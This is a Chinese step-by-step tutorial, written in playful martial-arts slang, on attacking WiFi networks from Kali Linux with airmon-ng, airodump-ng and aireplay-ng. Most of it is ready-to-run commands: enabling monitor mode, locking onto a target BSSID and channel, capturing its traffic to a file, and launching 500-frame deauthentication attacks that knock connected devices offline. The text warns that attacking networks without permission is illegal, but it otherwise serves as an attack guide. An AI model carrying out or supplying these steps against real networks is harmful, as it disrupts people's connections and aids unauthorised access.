WAPR天阶大法根基法之wifi爆破

1.准备兵器

一把废剑，有能者一步到位准备上古神兵

1.准备免驱网卡，一次到准备双频（支持）

2.将神兵注入灵力

1…将网卡差在主机上（虚拟机需要选择连接在虚拟机上）主机会自动连接

2…检查网卡

sudo su

开启root模式初始密码kali

ifconfig

检查网卡出现wlan0即为成功

3.打开神识

1.开启网卡的监听模式

airmon-ng start wlan0

名词解释

Bssid –无线路由的Mac地址

Pwr –附近wifi信号的强度

#Data 捕获到的数据包

CH –无线路由的信道

ESSID wifi名称

4.扫描全神

2.开启网卡进行扫描

airodump-ng wlan0mon

CTRL+C停止扫描

5.观识海

5.开启监听

airodump-ng --bssid (上面扫描到的bssid数值) -c（CH数值）–write qyyy wlan0mon

6.修炼大法

1.开始装X

aireplay-ng -a(上方bssid数值) -0 500 wlan0mon

┌──(root㉿kali)-[~]
└─# iwconfig wlan0 channel 14

┌──(root㉿kali)-[~]
└─# aireplay-ng -a AA:BB:CC:DD:EE:FF -0 500 wlan0

7.修炼成功技巧

核心招式技巧

核心指令代码

iwconfig #查看wlano是否存在

airmon-ng start wlan0 #打开wlan0

airodump-ng wlan0 --band a #扫描wlan0

（上一步得到信号道和wifi端的mac）

iwconfig wlan0 channel 信号道数字 #确定信号道。并监听该wifi

airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 信号道（ch列如16） --write qyyy wlan0 #锁定

airmon-ng check kill #清理缓存

aireplay-ng -a AA:BB:CC:DD:EE:FF -0 500 wlan0 #开始攻击wifi

注：Ctrl+C停止攻击F

不要攻击未经允许的wifi，违法的！DD

重新运行 airodump-ng，专注于频道 6 并观察目标 BSSID 是否存在

airodump-ng -c 6 wlan0mon

命令 iwconfig wlan0mon channel 11
作用：将无线网卡（wlan0mon）强制锁定到频道 11
各部分含义：
iwconfig：Linux 系统中用于配置无线网卡参数的命令
wlan0mon：处于监控模式（monitor mode）的无线网卡接口名
channel 11：指定要锁定的频道为 11（与目标 WiFi 的频道一致）

命令 aireplay-ng -a AA:BB:CC:DD:EE:FF -0 500 wlan0mon
作用：向目标 WiFi 发送大量断开连接帧，使连接的设备暂时掉线
各参数含义：
aireplay-ng：用于无线数据包注入和攻击的工具
-a AA:BB:CC:DD:EE:FF：指定目标 WiFi 的 BSSID（MAC 地址）
-0 500：表示发起 Deauthentication 攻击（-0是攻击模式），发送 500 个断开帧
wlan0mon：使用该监控模式网卡进行攻击

airodump-ng --essid “oppo a6” wlan0mon 扫面固定的wifi名

不要攻击未经允许的wifi，违法的！